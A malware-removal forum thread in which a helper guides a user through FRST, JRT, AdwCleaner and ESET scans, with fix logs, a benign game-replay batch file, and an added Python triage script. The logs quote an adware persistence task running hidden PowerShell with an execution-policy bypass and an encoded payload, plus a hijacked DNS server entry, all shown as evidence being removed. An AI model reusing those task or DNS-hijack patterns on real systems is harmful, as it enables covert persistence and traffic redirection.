    C:\ProgramData\e8446722-6f23-0
    C:\ProgramData\e8446722-2d61-1
    C:\ProgramData\e8446722-6925-0
    C:\ProgramData\e8446722-69a5-0
    C:\ProgramData\d2538854
    2016-02-20 20:01 - 2016-02-20 20:01 - 00003728 _____ C:\WINDOWS\System32\Tasks\{C6E33A63-3216-AF1A-2367-44E89883B011}
    C:\ProgramData\afa3c0d4-3a31-1
    C:\ProgramData\afa3c0d4-36d7-0
    C:\Users\Eirik\AppData\Local\Temp\32931009.t.exe
    Task: {86E25734-C69A-4DFA-90D3-8E33960A544D} - System32\Tasks\{C6E33A63-3216-AF1A-2367-44E89883B011} => /s /n /i:"/rt" "C:\PROGRA~3\d2538854\d0129810.dll"
    Task: {E0A724F9-2E64-483E-B1B1-9A0C7C41376A} - System32\Tasks\{09090D47-7809-0D78-0911-09090F0E117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9412 more characters).
    Tcpip\..\Interfaces\{37BFE48D-77CD-419D-8D47-2C194E38046A}: [DhcpNameServer] 82.163.143.171
    Tcpip\..\Interfaces\{C9B14333-EC8D-4272-ADBE-4ED48828BBD5}: [DhcpNameServer] 82.163.143.171
    Tcpip\..\Interfaces\{E9A4C058-84BB-4E14-81B1-3108B7D371F9}: [DhcpNameServer] 82.163.143.171
    CMD: type C:\Users\Eirik\Downloads\replay_1346256955.bat
    CMD: ipconfig /flushdns
    EmptyTemp:
    end
  • Click File > Save As and type fixlist.txt as the File Name
  • Important: The file must be saved in the same location as FRST64.exe. 

NOTICE: This script is intended for use on this particular machine. Do not use this script on any other machine; doing so may cause damage to your Operating System.

  • Right-Click FRST64.exe and select Run as administrator to run the programme.
  • Click Fix.
  • A log (Fixlog.txt) will open on your desktop. Copy the contents of the log and paste in your next reply.
     

STEP 2
Junkware Removal Tool (JRT)

  • Please download Junkware Removal Tool and save the file to your Desktop.
  • Temporarily disable your anti-virus software. For instructions, please refer to the following link.
  • Right-Click JRT.exe and select Run as administrator to run the programme.
  • Follow the prompts and allow the scan to run uninterrupted. 
  • Upon completion, a log (JRT.txt) will open on your desktop.
  • Re-enable your anti-virus software.
  • Copy the contents of JRT.txt and paste in your next reply.
     

STEP 3
AdwCleaner

  • Please download AdwCleaner and save the file to your Desktop.
  • Right-Click AdwCleaner.exe and select Run as administrator to run the programme.
  • Follow the prompts. 
  • Click Scan
  • Upon completion, click Logfile. A log (AdwCleaner[s1].txt) will open. Briefly check the log for anything you know to be legitimate. 
  • Ensure anything you know to be legitimate does not have a checkmark under the corresponding tab, and click Cleaning
  • Follow the prompts and allow your computer to reboot
  • After the reboot, a log (AdwCleaner[C1].txt) will open. Copy the contents of the log and paste in your next reply.

-- File and folder backups are made for items removed using this tool. Should a legitimate file or folder be removed (otherwise known as a 'false-positive'), simple steps can be taken to restore the item. Please do not overly concern yourself with the contents of AdwCleaner[s1].txt.
 
======================================================

STEP 4
Logs
In your next reply please include the following logs. Please be sure to copy and paste the requested logs, as well as provide information on any questions I may have asked.

  • Fixlog.txt
  • JRT.txt
  • AdwCleaner[C1].txt
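
A triage pass over the scheduled-task and DhcpNameServer entries in the fix script above, added here as an example (it is not part of the original thread and is not FRST code): it flags the traits visible in those lines and decodes the readable start of the truncated -EncodedCommand value. The expected resolver 192.168.1.1, the reason strings and all function names are assumptions made for the example.

```python
import base64
import re
from dataclasses import dataclass, field

# Entries copied from the fix script on this page. FRST itself cut the
# EncodedCommand value short ("the data entry has 9412 more characters").
SAMPLE_LINES = [
    r'Task: {86E25734-C69A-4DFA-90D3-8E33960A544D} - System32\Tasks\{C6E33A63-3216-AF1A-2367-44E89883B011} => /s /n /i:"/rt" "C:\PROGRA~3\d2538854\d0129810.dll"',
    r'Task: {E0A724F9-2E64-483E-B1B1-9A0C7C41376A} - System32\Tasks\{09090D47-7809-0D78-0911-09090F0E117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9412 more characters).',
    r'Tcpip\..\Interfaces\{37BFE48D-77CD-419D-8D47-2C194E38046A}: [DhcpNameServer] 82.163.143.171',
    r'Tcpip\..\Interfaces\{C9B14333-EC8D-4272-ADBE-4ED48828BBD5}: [DhcpNameServer] 82.163.143.171',
    r'Tcpip\..\Interfaces\{E9A4C058-84BB-4E14-81B1-3108B7D371F9}: [DhcpNameServer] 82.163.143.171',
]

# Assumption (constructed value): the resolver this network's DHCP server hands out.
EXPECTED_RESOLVERS = frozenset({"192.168.1.1"})

GUID = r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}"
TASK_RE = re.compile(r"^Task: " + GUID + r" - System32\\Tasks\\(?P<name>.+?) => (?P<cmd>.*)$")
DNS_RE = re.compile(r"^Tcpip\\\.\.\\Interfaces\\(?P<iface>" + GUID + r"): \[DhcpNameServer\] (?P<servers>.+)$")
TRUNC_RE = re.compile(r"\(the data entry has (\d+) more characters\)")


@dataclass
class Finding:
    kind: str                 # "task" or "dns"
    subject: str              # task name or interface GUID
    reasons: list = field(default_factory=list)
    decoded: str = ""         # readable start of an EncodedCommand, if any
    truncated_by: int = 0     # characters FRST left out of the log


def decode_encoded_command(blob):
    """Decode a possibly truncated -EncodedCommand value (base64 of UTF-16LE)."""
    blob = re.sub(r"[^A-Za-z0-9+/]", "", blob)
    blob = blob[: len(blob) - len(blob) % 4]   # keep whole base64 quanta only
    raw = base64.b64decode(blob)
    raw = raw[: len(raw) - len(raw) % 2]       # keep whole UTF-16 code units only
    return raw.decode("utf-16-le", errors="replace")


def _is_param(token, full, min_len, aliases=()):
    """PowerShell accepts abbreviated parameter names, so match on prefixes."""
    if not token.startswith(("-", "/")):
        return False
    name = token[1:].lower()
    return name in aliases or (len(name) >= min_len and full.startswith(name))


def triage_task(name, cmd):
    """Collect the heuristics that apply to one scheduled-task entry."""
    f = Finding("task", name)
    if re.fullmatch(GUID, name):
        f.reasons.append("task is named with a bare GUID")
    if re.search(r'~\d\\[^"\s]*\.dll', cmd, re.I):
        f.reasons.append("DLL referenced through an 8.3 short path")
    tokens = cmd.split()
    if tokens and tokens[0].lower().rsplit("\\", 1)[-1] in ("powershell.exe", "powershell"):
        for tok, nxt in zip(tokens[1:], tokens[2:] + [""]):
            if _is_param(tok, "encodedcommand", 1, ("ec",)):
                f.reasons.append("encoded command")
                f.decoded = decode_encoded_command(nxt)
            elif _is_param(tok, "executionpolicy", 2, ("ep",)) and nxt.lower() == "bypass":
                f.reasons.append("execution policy bypass")
            elif _is_param(tok, "windowstyle", 1) and nxt.lower() == "hidden":
                f.reasons.append("hidden window")
        m = TRUNC_RE.search(cmd)
        if m:
            f.truncated_by = int(m.group(1))
    return f


def triage(lines, expected_resolvers=EXPECTED_RESOLVERS):
    """Return one Finding per log line that matches at least one heuristic."""
    findings = []
    for line in lines:
        line = line.strip()
        if m := TASK_RE.match(line):
            f = triage_task(m["name"], m["cmd"])
            if f.reasons:
                findings.append(f)
        elif m := DNS_RE.match(line):
            odd = [s for s in re.split(r"[\s,]+", m["servers"])
                   if s and s not in expected_resolvers]
            if odd:
                findings.append(Finding("dns", m["iface"],
                                        ["unexpected DHCP name server " + s for s in odd]))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(f.kind, f.subject, "; ".join(f.reasons))
        if f.decoded:
            print("   decoded start:", f.decoded, f"(+{f.truncated_by} chars not in log)")
```

The decoded text is only the part FRST printed; the remaining characters of the command are not in the log, so the task's full behaviour cannot be read from this line alone.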

 

 

The file in question is a Windows Batch file, designed to execute commands via the Command Prompt. Did a user/player in-game send you this file to open? When communicating with players online, never download or open files sent to you as this could be a method of malware distribution. Before deleting the file, I would like to double-check the contents. 

If it is the one I think it is, I downloaded it from www.replay.gg, a third-party website that records games. It's supposed to be safe, but again; the names of those files are - like that one - very... hard to remember, so I can't really tell you if that's from there or not. 

fixlog.txt

 

 

Fix result of Farbar Recovery Scan Tool (x64) Version:21-02-2016

Ran by Eirik (2016-02-22 22:01:41) Run:1
Running from C:\Users\Eirik\Desktop
Loaded Profiles: Eirik (Available Profiles: Eirik)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
start
CreateRestorePoint:
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
Toolbar: HKLM - No Name - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} -  No File
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
C:\Program Files (x86)\Pando Networks
CHR HomePage: Default -> hxxps://no.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_camstd_15_52&param1=1&param2=f%3D1%26b%3DChrome%26cc%3Dno%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzz0Czzzy0AyDtD0DtCyD0AyEyE0B0F0BtN0D0Tzu0StCyEyDyEtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyE0B0E0CtB0BtB0BtGtD0EyDzytG0EyCyBzytGyByC0AtAtG0Bzz0CyByEyC0B0D0F0D0E0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0D0Azy0FtCyByE0BtGtC0E0FtCtGyEyC0BtAtG0A0EtBtCtGzz0D0AyE0AyCtCtA0Fzy0EyE2QtN0A0LzuyE%26cr%3D1100335688%26a%3Dwncy_camstd_15_52%26os_ver%3D6.3%26os%3DWindows%2B8.1
CHR StartupUrls: Default -> "hxxps://no.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_camstd_15_52&param1=1&param2=f%3D7%26b%3DChrome%26cc%3Dno%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzz0Czzzy0AyDtD0DtCyD0AyEyE0B0F0BtN0D0Tzu0StCyEyDyEtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyE0B0E0CtB0BtB0BtGtD0EyDzytG0EyCyBzytGyByC0AtAtG0Bzz0CyByEyC0B0D0F0D0E0A2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0D0Azy0FtCyByE0BtGtC0E0FtCtGyEyC0BtAtG0A0EtBtCtGzz0D0AyE0AyCtCtA0Fzy0EyE2QtN0A0LzuyE%26cr%3D1100335688%26a%3Dwncy_camstd_15_52%26os_ver%3D6.3%26os%3DWindows%2B8.1"
C:\ProgramData\e8446722-6f23-0
C:\ProgramData\e8446722-2d61-1
C:\ProgramData\e8446722-6925-0
C:\ProgramData\e8446722-69a5-0
C:\ProgramData\d2538854
2016-02-20 20:01 - 2016-02-20 20:01 - 00003728 _____ C:\WINDOWS\System32\Tasks\{C6E33A63-3216-AF1A-2367-44E89883B011}
C:\ProgramData\afa3c0d4-3a31-1
C:\ProgramData\afa3c0d4-36d7-0
C:\Users\Eirik\AppData\Local\Temp\32931009.t.exe
Task: {86E25734-C69A-4DFA-90D3-8E33960A544D} - System32\Tasks\{C6E33A63-3216-AF1A-2367-44E89883B011} => /s /n /i:"/rt" "C:\PROGRA~3\d2538854\d0129810.dll"
Task: {E0A724F9-2E64-483E-B1B1-9A0C7C41376A} - System32\Tasks\{09090D47-7809-0D78-0911-09090F0E117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9412 more characters).
Tcpip\..\Interfaces\{37BFE48D-77CD-419D-8D47-2C194E38046A}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{C9B14333-EC8D-4272-ADBE-4ED48828BBD5}: [DhcpNameServer] 82.163.143.171
Tcpip\..\Interfaces\{E9A4C058-84BB-4E14-81B1-3108B7D371F9}: [DhcpNameServer] 82.163.143.171
CMD: type C:\Users\Eirik\Downloads\replay_1346256955.bat
CMD: ipconfig /flushdns
EmptyTemp:
end
*****************
 
Restore point was successfully created.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive1" => key removed successfully
HKCR\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => key not found. 
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive2" => key removed successfully
HKCR\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => key not found. 
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive3" => key removed successfully
HKCR\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => key not found. 
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive1" => key removed successfully
HKCR\Wow6432Node\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => key not found. 
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive2" => key removed successfully
HKCR\Wow6432Node\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => key not found. 
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive3" => key removed successfully
HKCR\Wow6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => key not found. 
HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar\\{318A227B-5E9F-45bd-8999-7F8F10CA4CF5} => value removed successfully
HKCR\CLSID\{318A227B-5E9F-45bd-8999-7F8F10CA4CF5} => key not found. 
"HKLM\Software\Wow6432Node\MozillaPlugins\@pandonetworks.com/PandoWebPlugin" => key removed successfully
C:\Program Files (x86)\Pando Networks => moved successfully
Chrome HomePage => removed successfully
Chrome StartupUrls => removed successfully
C:\ProgramData\e8446722-6f23-0 => moved successfully
C:\ProgramData\e8446722-2d61-1 => moved successfully
C:\ProgramData\e8446722-6925-0 => moved successfully
C:\ProgramData\e8446722-69a5-0 => moved successfully
C:\ProgramData\d2538854 => moved successfully
C:\WINDOWS\System32\Tasks\{C6E33A63-3216-AF1A-2367-44E89883B011} => moved successfully
C:\ProgramData\afa3c0d4-3a31-1 => moved successfully
C:\ProgramData\afa3c0d4-36d7-0 => moved successfully
C:\Users\Eirik\AppData\Local\Temp\32931009.t.exe => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{86E25734-C69A-4DFA-90D3-8E33960A544D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{86E25734-C69A-4DFA-90D3-8E33960A544D}" => key removed successfully
C:\WINDOWS\System32\Tasks\{C6E33A63-3216-AF1A-2367-44E89883B011} => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{C6E33A63-3216-AF1A-2367-44E89883B011}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E0A724F9-2E64-483E-B1B1-9A0C7C41376A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E0A724F9-2E64-483E-B1B1-9A0C7C41376A}" => key removed successfully
C:\WINDOWS\System32\Tasks\{09090D47-7809-0D78-0911-09090F0E117A} => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{09090D47-7809-0D78-0911-09090F0E117A}" => key removed successfully
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{37BFE48D-77CD-419D-8D47-2C194E38046A}\\DhcpNameServer => value removed successfully
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{C9B14333-EC8D-4272-ADBE-4ED48828BBD5}\\DhcpNameServer => value removed successfully
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{E9A4C058-84BB-4E14-81B1-3108B7D371F9}\\DhcpNameServer => value removed successfully
 
=========  type C:\Users\Eirik\Downloads\replay_1346256955.bat =========
 
@echo off
setlocal enabledelayedexpansion
echo -----------------------
echo Spectate by op.gg
echo -----------------------
set RADS_PATH=
echo ===================
echo EN: Finding other LOL directory path..
echo ===================
FOR /f "usebackq skip=2 tokens=3,4,5,6,7,8,9" %%i in (`%systemroot%\system32\REG.EXE QUERY "HKCU\SOFTWARE\RIOT GAMES\RADS" /v "LOCALROOTFOLDER"`) DO  (
SET RADS_PATH=%%i %%j %%k %%l %%m %%n %%o
goto runApp
)
cls
echo ===================
echo EN: Finding other LOL directory path..
echo ===================
FOR /f "usebackq skip=2 tokens=3,4,5,6,7,8,9" %%i in (`%systemroot%\system32\REG.EXE QUERY "HKCU\SOFTWARE\Classes\VirtualStore\MACHINE\SOFTWARE\Wow6432Node\RIOT GAMES\RADS" /v "LOCALROOTFOLDER"`) DO (
SET RADS_PATH=%%i %%j %%k %%l %%m %%n %%o
goto runApp
)
cls
echo ===================
echo EN: Finding other LOL directory path..
echo ===================
FOR /f "usebackq skip=2 tokens=3,4,5,6,7,8,9" %%i in (`%systemroot%\system32\REG.EXE QUERY "HKCU\SOFTWARE\Classes\VirtualStore\MACHINE\SOFTWARE\RIOT GAMES\RADS" /v "LOCALROOTFOLDER"`) DO (
SET RADS_PATH=%%i %%j %%k %%l %%m %%n %%o
goto runApp
)
cls
echo ===================
echo EN: Finding other LOL directory path..
echo ===================
FOR /f "usebackq skip=2 tokens=3,4,5,6,7,8,9" %%i in (`%systemroot%\system32\REG.EXE QUERY "HKLM\Software\Wow6432Node\Riot Games\RADS" /v "LOCALROOTFOLDER"`) DO (
SET RADS_PATH=%%i %%j %%k %%l %%m %%n %%o
goto runApp
)
cls
echo ===================
echo EN: Finding other LOL directory path..
echo ===================
FOR /f "usebackq skip=2 tokens=3,4,5,6,7,8,9" %%i in (`%systemroot%\system32\REG.EXE QUERY "HKLM\Software\Wow6432Node\Riot Games\RADS" /v "LOCALROOTFOLDER"`) DO (
SET RADS_PATH=%%i %%j %%k %%l %%m %%n %%o
goto runApp
)
cls
echo ===================
echo EN: Finding other LOL directory path..
echo ===================
FOR /f "usebackq skip=2 tokens=3,4,5,6,7,8,9" %%i in (`%systemroot%\system32\REG.EXE QUERY "HKCU\SOFTWARE\RIOT GAMES\RADS" /v "LOCALROOTFOLDER"`) DO (
SET RADS_PATH=%%i %%j %%k %%l %%m %%n %%o
goto runApp
)
cls
echo ===================
echo EN: Finding other LOL directory path..
echo ===================
FOR /f "usebackq skip=2 tokens=3,4,5,6,7,8,9" %%i in (`%systemroot%\system32\REG.EXE QUERY "HKLM\SOFTWARE\RIOT GAMES\RADS" /v "LOCALROOTFOLDER"`) DO (
SET RADS_PATH=%%i %%j %%k %%l %%m %%n %%o
goto runApp
)
cls
echo ===================
echo EN: Finding other LOL directory path..
echo ===================
for /f "Tokens=3,4,5,6,7,8,9,10,11,12,13,14,15" %%a in ('%systemroot%\system32\REG.EXE Query HKLM\Software /V /F "LocalRootFolder" /S /E ^| %systemroot%\system32\find.exe "RADS"') do (
set RADS_PATH=%%a %%b %%c %%d %%e %%f %%g %%h %%i %%j %%k %%l %%m
goto runApp
)
cls
echo ===================
echo EN: Finding another LOL directory path..
echo ===================
for /f "Tokens=3,4,5,6,7,8,9,10,11,12,13,14,15" %%a in ('%systemroot%\system32\REG.EXE Query HKLM\Software /s ^| %systemroot%\system32\find.exe "LocalRootFolder" ^| %systemroot%\system32\find.exe "RADS"') do (
set RADS_PATH=%%a %%b %%c %%d %%e %%f %%g %%h %%i %%j %%k %%l %%m
goto runApp
)
cls
echo ===================
echo EN: Finding another LOL directory path..
echo ===================
for /f "Tokens=3,4,5,6,7,8,9,10,11,12,13,14,15" %%a in ('%systemroot%\system32\REG.EXE Query HKCU\Software /V /F "LocalRootFolder" /S /E ^| %systemroot%\system32\find.exe "RADS"') do (
set RADS_PATH=%%a %%b %%c %%d %%e %%f %%g %%h %%i %%j %%k %%l %%m
goto runApp
)
cls
echo ===================
echo EN: Finding another LOL directory path again..
echo ===================
for /f "Tokens=3,4,5,6,7,8,9,10,11,12,13,14,15" %%a in ('%systemroot%\system32\REG.EXE Query HKCU\Software /s ^| %systemroot%\system32\find.exe "LocalRootFolder" ^| %systemroot%\system32\find.exe "RADS"') do (
set RADS_PATH=%%a %%b %%c %%d %%e %%f %%g %%h %%i %%j %%k %%l %%m
goto runApp
)
cls
goto cannotFind
:runApp
set RADS_PATH=%RADS_PATH:/=\%
@cd /d "%RADS_PATH%\solutions\lol_game_client_sln\releases"
 
set init=0
set v0=0&set v1=0&set v2=0&set v3=0
for /f "delims=" %%F in ('dir *.*.*.* /b') do (
for /F "tokens=1,2,3,4 delims=." %%i in ("%%F") do (
if !init! equ 0 ( set init=1&set flag=1 ) else (
set flag=0
 
if %%i gtr !v0! ( set flag=1 ) else (
if %%j gtr !v1! ( set flag=1 ) else (
if %%k gtr !v2! ( set flag=1 ) else (
if %%l gtr !v3! ( set flag=1 )
)
)
)
)
 
if !flag! gtr 0 (
set v0=%%i&set v1=%%j&set v2=%%k&set v3=%%l
)
)
)
 
if !init! equ 0 goto cannotFind
set lolver=!v0!.!v1!.!v2!.!v3!
 
@cd /d "!RADS_PATH!\solutions\lol_game_client_sln\releases\!lolver!\deploy"
if exist "League of Legends.exe" (
@start "" "League of Legends.exe" "8394" "LoLLauncher.exe" "" "replay replay.gg:8080 mBnzoZNTDWCNJi1pm2RL8HTg8ToqjLw1 1346256955 EUN1"
goto exit
)
:cannotFind
echo ===================
echo EN: Cannot found LOL directory path for automatic. Please start your replay manually.
echo ===================
@pause
goto exit
:exit
========= End of CMD: =========
 
 
=========  ipconfig /flushdns =========
 
 
Windows IP Configuration
 
Successfully flushed the DNS Resolver Cache.
 
========= End of CMD: =========
 
EmptyTemp: => 432.8 MB temporary data Removed.
 
 
The system needed a reboot.
 
==== End of Fixlog 22:03:21 ====

 

JRT.txt

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.3 (02.09.2016)
Operating System: Windows 8.1 x64 
Ran by Eirik (Administrator) on 22-Feb-16 at 22:42:45.69
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
File System: 0 
 
 
 
 
Registry: 0 
 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 22-Feb-16 at 22:48:45.62
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 

 

AdwCleaner[C2].txt (I didn't get a C1, is that because I ran AdwCleaner the other day too?)

 

 

# AdwCleaner v5.036 - Logfile created 22/02/2016 at 23:04:05

# Updated 22/02/2016 by Xplode
# Database : 2016-02-22.2 [server]
# Operating system : Windows 8.1  (x64)
# Username : Eirik - NINJA
# Running from : C:\Users\Eirik\Desktop\adwcleaner_5.036.exe
# Option : Cleaning
 
***** [ Services ] *****
 
 
***** [ Folders ] *****
 
[-] Folder Deleted : C:\ProgramData\e8446722-0075-1
[-] Folder Deleted : C:\ProgramData\e8446722-0af1-1
[-] Folder Deleted : C:\ProgramData\e8446722-10c5-0
[-] Folder Deleted : C:\ProgramData\e8446722-2601-1
[-] Folder Deleted : C:\ProgramData\e8446722-29a1-0
[-] Folder Deleted : C:\ProgramData\e8446722-5e93-0
 
***** [ Files ] *****
 
 
***** [ DLLs ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Registry ] *****
 
 
***** [ Web browsers ] *****
 
 
*************************
 
:: "Tracing" keys removed
:: Winsock settings cleared
 
*************************
 
C:\AdwCleaner\AdwCleaner[C1].txt - [2807 bytes] - [21/02/2016 12:48:16]
C:\AdwCleaner\AdwCleaner[C2].txt - [1074 bytes] - [22/02/2016 23:04:05]
C:\AdwCleaner\AdwCleaner[s1].txt - [2936 bytes] - [21/02/2016 12:46:56]
C:\AdwCleaner\AdwCleaner[s2].txt - [1171 bytes] - [22/02/2016 22:59:21]
 
########## EOF - C:\AdwCleaner\AdwCleaner[C2].txt - [1293 bytes] ##########
 

Hello, 
 

If it is the one I think it is, I downloaded it from www.replay.gg, a third-party website that records games. It's supposed to be safe, but again; the names of those files are - like that one - very... hard to remember, so I can't really tell you if that's from there or not. 

You are correct. The file does indeed appear to be benign in nature. :)
 
Let's check for remnants. Please let me know if you are experiencing any outstanding issues. 
 
ESET Online Scan
Note: This scan may take a long time to complete. Please do not browse the Internet whilst your Anti-Virus is disabled.

  • Please download ESET Online Scan and save the file to your Desktop.
  • Temporarily disable your anti-virus software. For instructions, please refer to the following link.
  • Double-click esetsmartinstaller_enu.exe to run the programme. 
  • Agree to the EULA by placing a checkmark next to Yes, I accept the Terms of Use. Then click Start.
  • Agree to the Terms of Use once more and click Start. Allow components to download.
  • Place a checkmark next to Enable detection of potentially unwanted applications.
  • Click Advanced settings. Place a checkmark next to:
    • Scan archives
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • Ensure Remove found threats is unchecked.
  • Click Start.
  • Wait for the scan to finish. Please be patient as this can take some time.
  • Upon completion, click esetListThreats.png. If no threats were found, skip the next two bullet points. 
  • Click esetExport.png and save the file to your Desktop, naming it something such as "MyEsetScan".
  • Push the Back button.
  • Place a checkmark next to KN1w2nv.png and click SzOC1p0.png.
  • Re-enable your anti-virus software.
  • Copy the contents of the log and paste in your next reply.

 

 

You are correct. The file does indeed appear to be benign in nature.  :)

So I can keep using that site without being afraid? Just to make sure... :)

 

MyEsetScan.txt

 

 

C:\FRST\Quarantine\C\ProgramData\d2538854\d0129810.dll a variant of Win32/Adware.Adposhel.A application

C:\ProgramData\InstallMate\{28B463D4-430D-4875-AA9E-0B2FF3574122}\Custom.dll Win32/InstalleRex.L potentially unwanted application
C:\Users\All Users\InstallMate\{28B463D4-430D-4875-AA9E-0B2FF3574122}\Custom.dll Win32/InstalleRex.L potentially unwanted application
C:\Users\Eirik\AppData\LocalLow\Sun\Java\jre1.7.0_60\java_sp.dll a variant of Win32/Bundled.Toolbar.Ask.M potentially unsafe application
C:\Users\Eirik\AppData\Roaming\uTorrent\updates\3.3.2_30416.exe a variant of Win32/OpenCandy.A potentially unsafe application
C:\Users\Eirik\Downloads\ccsetup_513.exe Win32/Bundled.Toolbar.Google.D potentially unsafe application
C:\Users\Eirik\Downloads\utorrent.exe a variant of Win32/OpenCandy.A potentially unsafe application
 

Hello Eirik, 
 

So I can keep using that site without being afraid? Just to make sure...  :)

Yes, that's correct. The website appears to be OK. 
https://www.virustotal.com/en/url/b2257ecc079c7a4408d2a48f72a5e1cab64bf7f725c07fca68dc35e82816605a/analysis/1456298940/
 
Delete the following folder: C:\ProgramData\InstallMate\{28B463D4-430D-4875-AA9E-0B2FF3574122}
 
How is your computer performing? Are there any outstanding issues?


Alright, so I deleted that. 

 

 

 

How is your computer performing? Are there any outstanding issues?

In general?

It does take a long time to start up. 

I've also gotten some annoying FPS issues lately, where my frames drop from 60 to 10 every now and then. Other than that nothing I can think of. 

As for Firefox. It still doesn't work. It starts, but everything is blank as you can see in the pic below. I can hover over where I'd usually have bookmarks and stuff, but nothing shows up and I can't click anything. 
http://i.imgur.com/v457kRJ.jpg?1
This is not a malware issue, I believe, it looks like those are gone. At least the "X has been blocked" has not popped up in a while. 


Hi Eirik, 
 
Let me know if the following resolves the issue with your browser. 
 
Browser Reset
